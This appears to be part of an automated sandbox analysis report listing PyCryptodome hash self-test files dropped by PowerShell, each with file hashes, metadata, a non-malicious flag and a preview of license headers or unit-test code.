                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_BLAKE2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16796
                                                                                                                                                                                                  Entropy (8bit):4.783532264114981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vq5HZgqlLXNSvBrpJ2mlv/Io2mDdlSvyIxs2g:0r6qbgqlDNSvZpJDlv/IoDTSvQ2g
                                                                                                                                                                                                  MD5:63C8BAAC2382F26688A38B881323D894
                                                                                                                                                                                                  SHA1:005EECF1A5129FF2FD3350DF3F5561B87B1026F2
                                                                                                                                                                                                  SHA-256:D0770C758F2BD4BBFAC6C111050928550D39BB48254E2A9DA3934B40937FCD9F
                                                                                                                                                                                                  SHA-512:135B94C2F4C5E53B1206F6AD70FDC5D3E89C47DF842920951ED75917CD4E4CA0EB2B0E3BC60F31F70F6368612B7BB4BF07EA02BFFDEB5FC0276B3D365B08A0D3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_CMAC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13808
                                                                                                                                                                                                  Entropy (8bit):5.08051172614129
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Nqrskrs9t3q/Iiuaov/mlD7Y2v6W3nVJiUQkK/OroaaOh:krskrs9VqBm2LFJjK2Hl
                                                                                                                                                                                                  MD5:70594C0C5C1D69E570F8115F02EC0FDF
                                                                                                                                                                                                  SHA1:6B6BB2EF4F4C0BF757485FDF8EA0043F773F1D77
                                                                                                                                                                                                  SHA-256:9158FFBC96E70A527A5D5758A3E9D98D9DC8905818FB747A1A800A294A17D320
                                                                                                                                                                                                  SHA-512:19CB67F0CC67F4876D9319558C27118E34C2AF3DB7094CBB358BFC1A159396F5C3AF29EF39F1F1FDFF718C01159D9230651E6F92C1739D07486CC7E412EE2C87
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Hash/CMAC.py: Self-test for the CMAC module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO E

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_HMAC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20489
                                                                                                                                                                                                  Entropy (8bit):5.153740738312008
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:UwdQHvJzEI5mSHorDwxwwbTc9untXdDGVoyGZ6GoGd4q1EGhEGmKOuCdliWErLOp:UUe9O6orMTc9upR2oya6b04q1EEEYmB
                                                                                                                                                                                                  MD5:D0E673489A9A73F4F6A9C8F8A12E6F1B
                                                                                                                                                                                                  SHA1:61EB91C23346DD275DAA966EB6BC3BBCE71288C9
                                                                                                                                                                                                  SHA-256:1F8AD7D399CE6D2449F3413E26BF73403860C79114807776DA866E29E764606A
                                                                                                                                                                                                  SHA-512:AAEAF15D71C6AC3EA55A64A60E6E51A0DF37AA36FC21E5952D539E15BA781CC22C57CE907D858BF10EF12DEF87CD1696CD3D2FCD594008C6544A8BC787498FC4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/HMAC.py: Self-test for the HMAC module..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_KMAC.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12050
                                                                                                                                                                                                  Entropy (8bit):4.62363520730185
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:KCuRMf+Lb6RdXoVtMocxo1wBofWuFo/JAo1wBofWC+Po1wBofWFO0tzCerYb+Oa:l586Rd4T5FuhTFdFmO0tYb6
                                                                                                                                                                                                  MD5:01EFB03BD8164982157BB85495EEA984
                                                                                                                                                                                                  SHA1:1ACB78C5EDFFD8E3029CE23AD2361D9E0D80D884
                                                                                                                                                                                                  SHA-256:3BD587FF74064862E669CDFB0AFC6EF1489E751C9F67746757F0CC3F4F62D0E3
                                                                                                                                                                                                  SHA-512:65C3FEF9E21662C45C57ED544F9956E8AF6FE072115084CF52FFC796FB30CC98DC03B96A838DA895DFDDBB8B5B00FBDAD3E8FAE2DD8F5CAA8D0E4301A9576684
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..from binascii import unhexlify, hexlify....from Crypto.Util.py3compat import tobytes..from Crypto.Util.strxor import strxor_c..from Crypto.SelfTest.st_common import list_test_cases....from Crypto.Hash import KMAC128, KMAC256......class KMACTest(unittest.TestCase):.... def new(self, *args, **kwargs):.. return self.KMAC.new(key=b'X' * (self.minimum_key_bits // 8), *args, **kwargs).... def test_new_positive(self):.... key = b'X' * 32.... h = self.new().. for new_func in self.KMAC.new, h.new:.... for dbytes in range(self.minimum_bytes, 128 + 1):.. hobj = new_func(key=key, mac_len=dbytes).. self.assertEqual(hobj.digest_size, dbytes).... digest1 = new_func(key=key, data=b"\x90").digest().. digest2 = new_func(key=key).update(b"\x90").digest().. self.assertEqual(digest1, digest2).... new_func(data=b"A", key=key, custom=b"g").... hobj = h.new(key=key)..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_KangarooTwelve.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12085
                                                                                                                                                                                                  Entropy (8bit):5.069402054924231
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Gqrskrs9t3q/IEPNfCuz+CSwVR7RRUpWCtuAbHQNXa8aXiJm6mkmGrrDkcpMgw9d:xrskrs9VqrPNfC6RLCtuA52FBf3s974G
                                                                                                                                                                                                  MD5:51BC6116F75310E905FF849BFAD261E3
                                                                                                                                                                                                  SHA1:677B0343C2B13AC9A1EFA4A0BDB6EA131F2C9E86
                                                                                                                                                                                                  SHA-256:0C889CE5DD48A302E3B9F9319CAD868CF7B12361715FD5DD4E37EF26259A50E8
                                                                                                                                                                                                  SHA-512:1791D19938C5F45CB2A7F784379662DB7230F74A060A12FD7C50EAF55962FE76F855FA4DFDDA1E502739FCC1FBD3A58675AA0CA804C48CBCF8E2854B6BF411E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# ===================================================================..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_MD2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2386
                                                                                                                                                                                                  Entropy (8bit):5.563614742388662
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NIwEIB0jcQHMsvI/S3oCFlYp+Qk0Y3h18+7L0Tk1CTIDdTzJcw+aZa:6wfFQHvovpHkPs+YoaIDdXJ9+B
                                                                                                                                                                                                  MD5:EE0B8F5FA22BF119A11D2D9A320CEC0C
                                                                                                                                                                                                  SHA1:9D6632F341660A75B70291F2F42888842B0897A1
                                                                                                                                                                                                  SHA-256:A909BD63262259EF3E795AA112FAAA10FDD71C713948834CACE1619818B2DBBA
                                                                                                                                                                                                  SHA-512:418A6ABA57CB0BD4AC03F7465706884B41FBFA7A4A56DFABEB93D4BB845A4ABAB78B82DE7A47C85FA4AFC25B1EE4F56A4EDF18D3158DCA7BEDAF1BFB12EDCDD2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD2.py: Self-test for the MD2 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_MD4.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2411
                                                                                                                                                                                                  Entropy (8bit):5.564357195995625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:N/YPwEIB0jcQHMsvI/S3oCFlYk+Qk0Y3bSQxLgy9eTkM1CT+B1DdTycJcw8aZa:KPwfFQHvoZkHkPrZj9mkwa+XDdNJ98B
                                                                                                                                                                                                  MD5:B169D3B94C943706AD3069C14BD5EE3B
                                                                                                                                                                                                  SHA1:69A066643B88A30482167E6C7C827739735C37D1
                                                                                                                                                                                                  SHA-256:A2149F6DB57F2E73130C7EC05F8895C6DF475A46DF25C860EC3801D97C630CB0
                                                                                                                                                                                                  SHA-512:D7C8A4DE5785693F7E03521D5938393A0297E33C46B476B8798C2603FB04238CAE66C9253DF91B2E1228B14DEEE9D7A67EE7ED1BDF5BED3D801875F1EDA2E203
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD4.py: Self-test for the MD4 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_MD5.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3378
                                                                                                                                                                                                  Entropy (8bit):5.487737815096217
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CwfFQHvoiH2wrrPTp3zSKfah0alZ5WymRbm8bOB:CwdQHvjTcv04ZCbOB
                                                                                                                                                                                                  MD5:00D21F3FD88D5FFF84B6390BD49F5789
                                                                                                                                                                                                  SHA1:26C99A545ED37788AAC8DD8B97E1365661ABDEC2
                                                                                                                                                                                                  SHA-256:4CF30101B12752C5921278CC8C04B52B8A603E3BC2736CBF5E7166C38210C805
                                                                                                                                                                                                  SHA-512:74F52B434107741F0CD5DADC342083FFF15BF4C669CA06A53DF866666A020C7932E55A8DC5AA59ADB634F3E409E32811657783FAF6509A4440987AB7811C976E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/MD5.py: Self-test for the MD5 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WIT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_Poly1305.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18839
                                                                                                                                                                                                  Entropy (8bit):5.021901108374911
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Lqrskrs9t3q/IzdWAzvcZ4ftgR248rY9JEbh419x2Z4IKcSni/BY5+paPGznuHOp:Orskrs9VqdAuhV3Em19asn75lGznuC
                                                                                                                                                                                                  MD5:308A4FB6F5356DA99DE36AE855E234FD
                                                                                                                                                                                                  SHA1:F0C625216F21221E46F9394F99C3B1D9346BB287
                                                                                                                                                                                                  SHA-256:2973B56CFC48F62BA1FEC363877340BCCE4C99AD7870733389996B2404C454C9
                                                                                                                                                                                                  SHA-512:4BBF414177BB791C2EBA9FB2C3CEB9B4B28477B7AAE6B29FFF066F3F3B8A6D92C9618985352CE5B0825520C2900666D7E4A5A8998F51B332DE5A1D7161467535
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Hash/test_Poly1305.py: Self-test for the Poly1305 module..#..# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISC

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_RIPEMD160.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2734
                                                                                                                                                                                                  Entropy (8bit):5.5822326330531045
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:N6wEIB0jcQHMsvI/S3oCFmn+Qk0Y8ZD72mvhPmLluTyReW1CTv/3asdTjyJcwrJq:EwfFQHvoDHkP8ZD73BIl2xeav/3asdC4
                                                                                                                                                                                                  MD5:C094CE0002F8AB6D589F019925301DBE
                                                                                                                                                                                                  SHA1:3AE527E1FA4439B853635F73E2D3D56BCBCF992B
                                                                                                                                                                                                  SHA-256:7349C09C56BA9A32364240EA09F439F0857CA8373ECF0AE72E4B5E352F64A5AB
                                                                                                                                                                                                  SHA-512:42B6A9C710BE47EAA8AB1C265CEF62713041310061B2AA7597BCBE7D59627998341582A6497B4113AFAAE11150E35F85689E1FC975BF9F10D392F831DB573200
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_RIPEMD160.py: Self-test for the RIPEMD-160 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA1.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3010
                                                                                                                                                                                                  Entropy (8bit):5.250435036736198
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NH9wEIB0jcQHMsvI/S3oCFlZtjT+syLT097MSGrdTldgjIoQ8ZSkqIhF6raZa:rwfFQHvooBH4u7fGrd/g28ZSEhgrB
                                                                                                                                                                                                  MD5:8E777572B29546D060E07444E25D92F8
                                                                                                                                                                                                  SHA1:47D40F9DCE353BF1FD82CF1469EB5E44A267A1A4
                                                                                                                                                                                                  SHA-256:DBD7878B214ACC6D24164B67B5161BF6AF4EDCCA3BC498DCCB6B27A360D7F3CC
                                                                                                                                                                                                  SHA-512:9C76B2890733937AF44E0872755DA84DF81CEB3FB438D78AAB1640B1072D47871566FC62CC7ADD98E41DD0CB4211A098D29556DB2A189F8CA2699CF0D1987CE7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/SHA1.py: Self-test for the SHA-1 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA224.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2596
                                                                                                                                                                                                  Entropy (8bit):5.555931747660862
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NHAwEIB0jcQHMsvI/S3oCFlUyLT0goLdBqSTDfm5XToJcwkN9aZa:BAwfFQHvon4KBjvfmpcJ9e9B
                                                                                                                                                                                                  MD5:B8272B893F84638AC7604C66D3A39377
                                                                                                                                                                                                  SHA1:3E9F2AE5034A1273F2858E056A2243E66083C300
                                                                                                                                                                                                  SHA-256:DDEE3A1A84DB48FF22767CF608328DA5A29FECAF3200DA8ED96DD3742108EC88
                                                                                                                                                                                                  SHA-512:B18E78D78AA312856243761AFFB20563DDADEB76E54A36020F613BE46D3F54AD36719A976FABA5E770D5EFE20051B788EB2CEE31CC96775A8C53F1A00EECD383
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Hash/test_SHA224.py: Self-test for the SHA-224 hash function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CO

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Hash\test_SHA256.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3711
                                                                                                                                                                                                  Entropy (8bit):5.410059181897839
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CwfFQHvozH8LqjLdPa6nHQhq/vElfHY6rB:CwdQHv/ej1aq3EW6rB
                                                                                                                                                                                                  MD5:4EC91C526F642FAC5FBBA2403B6979E8
                                                                                                                                                                                                  SHA1:C2687CC0D6D8039B6C9CCFD0CB168E1422CC0854
                                                                                                                                                                                                  SHA-256:3F4BEBB1DB2B687741C27AC9D56E16972660AF0A74B21417C4CB50A1A001EDFB
                                                                                                                                                                                                  SHA-512:F251427EDF4AE58BF83269948AC409F277762947A362C7FB34D415C9EDD0468E57BCA0C807F1E8979524A4B076BE2AA00EB80E654A3606206EBBF369612B81F0
                                                                                                                                                                                                  Malicious:false
